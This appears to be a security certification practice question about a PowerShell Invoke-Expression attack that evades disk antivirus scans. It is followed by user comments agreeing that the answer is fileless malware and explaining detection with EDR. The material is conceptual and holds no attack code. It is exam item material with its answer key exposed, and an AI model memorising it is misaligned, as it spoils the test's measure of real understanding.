A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware.
Which of the following BEST describes the type of malware the solution should protect against?
Fileless malware is a type of malicious software that operates in memory rather than writing files to the hard disk, making it more difficult to detect with traditional antivirus solutions that rely on scanning files. This type of malware often uses legitimate system tools, such as PowerShell, to execute its payload, which aligns with the scenario described where the malware used the Invoke-Expression function in PowerShell and no Indicators of Compromise (IOCs) were found on disk.
Antivirus Software is signature-based and scans when the data is at rest or accessed. Logic bombs, rootkits, and Worms reside on the filesystem. Fileless means it is volatile, temporary, and exists in the RAM. Source: Verifying each answer against Chat GPT, my experience, other test banks, a written book, and weighing in the discussion from all users to create a 100% accurate guide for myself before I take the exam. (It isn't easy because of the time needed, but it is doing my diligence)
key point is that used PowerShell and it was not found by antivirus so uses exploit https://www.crowdstrike.com/cybersecurity-101/malware/fileless-malware/
Fileless malware is a type of malicious activity that uses native, legitimate tools built into a system to execute a cyber attack.
fileless is the right answer
The use of PowerShell and the Invoke-Expression function indicates that the attack is leveraging the scripting capabilities within the system, which is a hallmark of fileless malware. The absence of Indicators of Compromise (IOCs) on disk, despite scanning with an antivirus, suggests that the malware might be operating in memory or using fileless techniques.
C. Fileless A fileless malware attack involves malware that operates in memory, instead of writing files to the hard drive, making it more challenging to detect with traditional antivirus solutions. This type of malware can use legitimate scripting languages (like PowerShell) and tools native to the operating system to execute malicious activities, which seems to match the situation described in the question. Worms (A) are a type of malware that spread across networks, typically without user intervention. Logic bombs (B) are malicious payloads that are triggered by a specific event. Rootkits (D) are malware that provide privileged (root-level) access to a computer while hiding their presence. While any of these could theoretically use fileless techniques, the specific focus on PowerShell and the failure of disk scanning to find Indicators of Compromise (IOCs) suggest fileless malware is the most accurate answer.
The description of the attack suggests that the type of malware the solution should protect against is Fileless malware. Therefore, the correct option is C.
C is the correct answer
Characteristics: Fileless malware does not write any files to disk. Instead, it resides in memory and uses legitimate system tools (such as PowerShell) to execute malicious activities. Behavior: Since it operates in memory, it can evade traditional antivirus solutions that rely on scanning files on disk. This type of malware often leverages built-in tools like PowerShell to download and execute malicious scripts directly from the internet. Detection and Protection: Protecting against fileless malware typically involves using endpoint detection and response (EDR) tools, advanced threat protection solutions, and monitoring for unusual behavior and use of system tools.